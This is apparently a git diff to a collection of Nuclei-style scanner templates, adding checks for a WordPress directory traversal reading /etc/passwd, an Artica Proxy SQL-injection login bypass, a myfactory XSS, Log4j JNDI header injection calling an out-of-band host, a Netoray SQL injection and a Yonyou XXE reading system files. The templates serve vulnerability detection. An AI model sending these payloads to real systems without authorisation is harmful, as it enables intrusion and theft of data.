diff --git a/date.txt b/date.txt index e88fa6b412..ff13db4fe3 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240630 +20240701 diff --git a/poc.txt b/poc.txt index 5bcde3bc17..23d7b3cd9e 100644 --- a/poc.txt +++ b/poc.txt @@ -40498,6 +40498,7 @@ ./poc/cve/cve-2015-4414-2530.yaml ./poc/cve/cve-2015-4414-2531.yaml ./poc/cve/cve-2015-4414-2532.yaml +./poc/cve/cve-2015-4414.yaml ./poc/cve/cve-2015-4632-2533.yaml ./poc/cve/cve-2015-4632-2534.yaml ./poc/cve/cve-2015-4632-2535.yaml @@ -43042,6 +43043,7 @@ ./poc/cve/cve-2020-17506-4681.yaml ./poc/cve/cve-2020-17506-4682.yaml ./poc/cve/cve-2020-17506-4683.yaml +./poc/cve/cve-2020-17506.yaml ./poc/cve/cve-2020-17518-4684.yaml ./poc/cve/cve-2020-17518-4685.yaml ./poc/cve/cve-2020-17518-4686.yaml @@ -45222,6 +45224,7 @@ ./poc/cve/cve-2021-42565-6511.yaml ./poc/cve/cve-2021-42565-6512.yaml ./poc/cve/cve-2021-42565-6513.yaml +./poc/cve/cve-2021-42565.yaml ./poc/cve/cve-2021-42566-1(1).yaml ./poc/cve/cve-2021-42566-2(1).yaml ./poc/cve/cve-2021-42566-6514.yaml @@ -51629,6 +51632,7 @@ ./poc/header/insert-headers-and-footers.yaml ./poc/header/jenkins-headers-detect.yaml ./poc/header/jfrog-version-header.yaml +./poc/header/log4j-all-headers.yaml ./poc/header/log4j-header.yaml ./poc/header/maxforwards-headers-detect.yaml ./poc/header/missing-hsts-header.yaml @@ -98129,6 +98133,7 @@ ./poc/sql/nd-shortcodes-1df3ea9dadde70dead5b7fe3f433db07.yaml ./poc/sql/nd-shortcodes-59ae582069dfefb7ecef9bedbd9caeab.yaml ./poc/sql/nd-shortcodes-f29dbb12c2996c2a86af0c78d896fbe5.yaml +./poc/sql/netoray-sqli.yaml ./poc/sql/netwin-dbabble.yaml ./poc/sql/neuvoo-jobroll-7575942edfc25ccc362dbf6031c222eb.yaml ./poc/sql/new-order-notification-for-woocommerce-49439a7e50ee67cd1bb7eb21dbcf870f.yaml @@ -100957,6 +100962,7 @@ ./poc/sql_injection/mysqldumper.yaml ./poc/sql_injection/mysqlman.yaml ./poc/sql_injection/mywebsql.yaml +./poc/sql_injection/netoray-sqli.yaml ./poc/sql_injection/niushop-sqli.yaml ./poc/sql_injection/notificationx-sqli.yaml ./poc/sql_injection/oa8000-workflowservice-sql-inject.yaml @@ -111472,6 +111478,7 @@ ./poc/xml_external_entity/yongyou-ufida-oa-uapws-xxe.yaml ./poc/xml_external_entity/yongyou_soapFormat_xxe.yaml ./poc/xml_external_entity/yongyou_xxe.yaml +./poc/xml_external_entity/yonyou-u8-cloud-showRPCLoadingTip-xxe.yaml ./poc/xml_external_entity/yonyou-u8-cloud-xchangeservlet-xxe.yaml ./poc/xml_external_entity/yonyou-u8cloud-hrss-xxe.yaml ./poc/xml_external_entity/yonyou_EHR-xxe-smartweb2.yaml diff --git a/poc/cve/cve-2015-4414.yaml b/poc/cve/cve-2015-4414.yaml new file mode 100644 index 0000000000..b534590b27 --- /dev/null +++ b/poc/cve/cve-2015-4414.yaml @@ -0,0 +1,35 @@ +id: CVE-2015-4414 + +info: + name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal + author: daffainfo + severity: high + description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/37274 + - https://nvd.nist.gov/vuln/detail/CVE-2015-4414 + - https://www.exploit-db.com/exploits/37274/ + - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html + classification: + cve-id: CVE-2015-4414 + metadata: + google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player" + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/08 diff --git a/poc/cve/cve-2020-17506.yaml b/poc/cve/cve-2020-17506.yaml new file mode 100644 index 0000000000..fee3f8e5ff --- /dev/null +++ b/poc/cve/cve-2020-17506.yaml @@ -0,0 +1,42 @@ +id: CVE-2020-17506 + +info: + name: Artica Web Proxy 4.30 Authentication Bypass + author: dwisiswant0 + severity: critical + description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php. + + # Artica Web Proxy 4.30.00000000 + # allows remote attacker to bypass privilege detection + # and gain web backend administrator privileges + # through SQL injection of the apikey parameter in fw.login.php. + # - + # References: + # > https://blog.max0x4141.com/post/artica_proxy/ + +requests: + - method: GET + path: + - "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;" + redirects: true + max-redirects: 1 + matchers-condition: and + matchers: + - type: word + words: + - "artica-applianc" + - type: status + status: + - 200 + - 301 + - 302 + condition: or + - type: word + name: session + words: + - "PHPSESSID" + part: header + extractors: + - type: kval + kval: + - "PHPSESSID" diff --git a/poc/cve/cve-2021-42565.yaml b/poc/cve/cve-2021-42565.yaml new file mode 100644 index 0000000000..f860c4f25f --- /dev/null +++ b/poc/cve/cve-2021-42565.yaml @@ -0,0 +1,41 @@ +id: CVE-2021-42565 + +info: + author: madrobot + name: myfactory FMS - Reflected Cross-Site Scripting + severity: medium + description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42565 + - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-42565 + cwe-id: CWE-79 + tags: cve,cve2021,myfactory,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "" + condition: and + + - type: word + part: header + words: + - "text/html" + +# Enhanced by mp on 2022/02/27 diff --git a/poc/header/log4j-all-headers.yaml b/poc/header/log4j-all-headers.yaml new file mode 100644 index 0000000000..55d109ae39 --- /dev/null +++ b/poc/header/log4j-all-headers.yaml @@ -0,0 +1,55 @@ +id: log4j-fuzz-head-poc + +info: + name: log4j-rce漏洞 + author: xxx + severity: critical + tags: apache,rce + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + {{log4j_payloads}} + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + {{log4j_payloads}} + payloads: + log4j_payloads: + - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}' + - 'X-Remote-IP: ${jndi:ldap://{{interactsh-url}}/info}' + - 'X-Remote-Addr: ${jndi:ldap://{{interactsh-url}}/info}' + - 'X-Forwarded-For: ${jndi:ldap://{{interactsh-url}}/info}' + - 'X-Originating-IP: ${jndi:ldap://{{interactsh-url}}/info}' + - 'User-Agent: ${jndi:ldap://{{interactsh-url}}/info}' + - 'Referer: ${jndi:ldap://{{interactsh-url}}/info}' + - 'CF-Connecting_IP: ${jndi:ldap://{{interactsh-url}}/info}' + - 'True-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}' + - 'X-Forwarded-For: ${jndi:ldap://{{interactsh-url}}/info}' + - 'Originating-IP: ${jndi:ldap://{{interactsh-url}}/info}' + - 'X-Real-IP: ${jndi:ldap://{{interactsh-url}}/info}' + - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}' + - 'Forwarded: ${jndi:ldap://{{interactsh-url}}/info}' + - 'Client-IP: ${jndi:ldap://{{interactsh-url}}/info}' + - 'Contact: ${jndi:ldap://{{interactsh-url}}/info}' + - 'X-Wap-Profile: ${jndi:ldap://{{interactsh-url}}/info}' + - 'X-Api-Version: ${jndi:ldap://{{interactsh-url}}/info}' + - 'Host: ${jndi:ldap://{{interactsh-url}}/info}' + + attack: clusterbomb + matchers-condition: or + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" + + - type: word + part: interactsh_protocol + name: dns + words: + - "dns" diff --git a/poc/sql/netoray-sqli.yaml b/poc/sql/netoray-sqli.yaml new file mode 100644 index 0000000000..51e116903a --- /dev/null +++ b/poc/sql/netoray-sqli.yaml @@ -0,0 +1,24 @@ +id: Netoray-sqli + +info: + name: Netoray上网行为管理系统sql注入漏洞 + author: Str1am + severity: high + reference: http://www.anquan.us/static/bugs/wooyun-2016-0171547.html + tags: Netoray,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/bottomframe.cgi?user_name='))%20union%20select%20md5(1)%23where%20name%3d'superadmin'%23" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "c4ca4238a0b923820dcc509a6f75849b" + part: body + condition: and diff --git a/poc/sql_injection/netoray-sqli.yaml b/poc/sql_injection/netoray-sqli.yaml new file mode 100644 index 0000000000..51e116903a --- /dev/null +++ b/poc/sql_injection/netoray-sqli.yaml @@ -0,0 +1,24 @@ +id: Netoray-sqli + +info: + name: Netoray上网行为管理系统sql注入漏洞 + author: Str1am + severity: high + reference: http://www.anquan.us/static/bugs/wooyun-2016-0171547.html + tags: Netoray,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/bottomframe.cgi?user_name='))%20union%20select%20md5(1)%23where%20name%3d'superadmin'%23" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "c4ca4238a0b923820dcc509a6f75849b" + part: body + condition: and diff --git a/poc/xml_external_entity/yonyou-u8-cloud-showRPCLoadingTip-xxe.yaml b/poc/xml_external_entity/yonyou-u8-cloud-showRPCLoadingTip-xxe.yaml new file mode 100644 index 0000000000..b1381ba1eb --- /dev/null +++ b/poc/xml_external_entity/yonyou-u8-cloud-showRPCLoadingTip-xxe.yaml @@ -0,0 +1,34 @@ +id: yonyou-u8-cloud-showRPCLoadingTip-xxe + +info: + name: Ufida U8-Cloud smartweb2.showRPCLoadingTip.d XXE + author: Co5mos + severity: critical + description: | + 用友U8-Cloud `smartweb2.showRPCLoadingTip.d` 接口存在XXE漏洞,攻击者可以利用此漏洞读取服务器上的任意文件。 + metadata: + fofa-query: app="用友-U8-Cloud" + tags: xxe, ufida, cloud + +http: + - raw: + - | + POST /hrss/dorado/smartweb2.showRPCLoadingTip.d?skin=default&__rpc=true&windows=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __type=updateData&__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=%3C%21DOCTYPE+z+%5B%3C%21ENTITY+test++SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%5D%3E%3Crpc+transaction%3D%221%22+method%3D%22resetPwd%22%3E%3Cdef%3E%3Cdataset+type%3D%22Custom%22+id%3D%22dsResetPwd%22%3E%3Cf+name%3D%22user%22%3E%3C%2Ff%3E%3C%2Fdataset%3E%3C%2Fdef%3E%3Cdata%3E%3Crs+dataset%3D%22dsResetPwd%22%3E%3Cr+id%3D%221%22+state%3D%22insert%22%3E%3Cn%3E%3Cv%3E1%3C%2Fv%3E%3C%2Fn%3E%3C%2Fr%3E%3C%2Frs%3E%3C%2Fdata%3E%3Cvps%3E%3Cp+name%3D%22__profileKeys%22%3E%26test%3B%3C%2Fp%3E%3C%2Fvps%3E%3C%2Frpc%3E + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: status + status: + - 200